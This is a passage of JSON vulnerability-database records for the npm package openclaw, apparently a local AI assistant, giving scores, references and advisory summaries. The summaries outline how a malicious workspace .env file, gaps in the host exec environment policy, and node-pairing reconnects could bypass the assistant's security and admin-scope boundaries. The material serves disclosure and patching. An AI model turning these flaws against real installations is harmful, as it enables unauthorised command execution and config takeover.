"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["GHSA-89hr-6x2p-8xjv"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1p3b-pfnn-x7ad"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89787?format=json","vulnerability_id":"VCID-1p5p-eth5-3ufu","summary":"OpenClaw: Host exec environment overrides miss proxy, TLS, Docker, and Git TLS controls\n## Summary\nHost exec environment overrides miss proxy, TLS, Docker, and Git TLS controls\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: Real in shipped v2026.3.28: host exec env policy still missed proxy, TLS, Docker, and Git TLS variables until 4d912e0451 on 2026-03-31; maintainers already accepted it and the fix is unreleased.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `4d912e04519b4bd53b248437c53748cdebce9a41` — 2026-03-31T21:25:36+09:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41330","reference_id":"","reference_type":"","scores":[{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.0286","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02913","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02906","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41330"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"4.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/4d912e04519b4bd53b248437c53748cdebce9a41","reference_id":"","reference_type":"","scores":[{"value":"4.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:39:14Z/"}],"url":"https://github.com/openclaw/openclaw/commit/4d912e04519b4bd53b248437c53748cdebce9a41"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"4.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9gp8-hjxr-6f34","reference_id":"","reference_type":"","scores":[{"value":"4.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:39:14Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9gp8-hjxr-6f34"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41330","reference_id":"","reference_type":"","scores":[{"value":"4.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41330"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-environment-variable-override-via-host-exec-policy","reference_id":"","reference_type":"","scores":[{"value":"4.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:39:14Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-environment-variable-override-via-host-exec-policy"},{"reference_url":"https://github.com/advisories/GHSA-9gp8-hjxr-6f34","reference_id":"GHSA-9gp8-hjxr-6f34","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9gp8-hjxr-6f34"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41330","GHSA-9gp8-hjxr-6f34"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1p5p-eth5-3ufu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90329?format=json","vulnerability_id":"VCID-1pbz-8rnx-dkhe","summary":"OpenClaw: Node Pairing Reconnect Command Escalation Bypasses operator.admin Scope Requirement\n## Impact\n\nNode Pairing Reconnect Command Escalation Bypasses operator.admin Scope Requirement.\n\nA previously paired node could reconnect with a broader command set, including exec-capable commands, without forcing the operator/admin re-pairing path.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<=2026.4.5`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @zsxsoft and @KeenSecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42432","reference_id":"","reference_type":"","scores":[{"value":"0.00027","scoring_system":"epss","scoring_elements":"0.08076","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00027","scoring_system":"epss","scoring_elements":"0.08073","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00027","scoring_system":"epss","scoring_elements":"0.0809","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42432"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5wj5-87vq-39xm","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T18:17:47Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5wj5-87vq-39xm"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42432","reference_id":"CVE-2026-42432","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42432"},{"reference_url":"https://github.com/advisories/GHSA-5wj5-87vq-39xm","reference_id":"GHSA-5wj5-87vq-39xm","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5wj5-87vq-39xm"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-command-escalation-via-node-pairing-reconnect-bypass","reference_id":"openclaw-command-escalation-via-node-pairing-reconnect-bypass","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T18:17:47Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-command-escalation-via-node-pairing-reconnect-bypass"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["CVE-2026-42432","GHSA-5wj5-87vq-39xm"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1pbz-8rnx-dkhe"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89803?format=json","vulnerability_id":"VCID-1smq-mbty-jkaj","summary":"OpenClaw has a CWD `.env` environment variable injection which bypasses host-env policy and allows config takeover\n## Summary\n\nOpenClaw loaded the current working directory `.env` before trusted state-dir configuration, allowing untrusted workspace state to inject host environment values.\n\n## Impact\n\nA repository or workspace containing a malicious `.env` file could override runtime configuration and security-sensitive environment settings when OpenClaw started there.\n\n## Affected Component\n\n`src/infra/dotenv.ts, src/cli/dotenv.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `6a79324802` (`Filter untrusted CWD .env entries before OpenClaw startup`).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41294","reference_id":"","reference_type":"","scores":[{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.03519","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.03533","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.0352","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41294"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/6a793248024dca7685f63bcceb64a0096fd1586d","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/6a793248024dca7685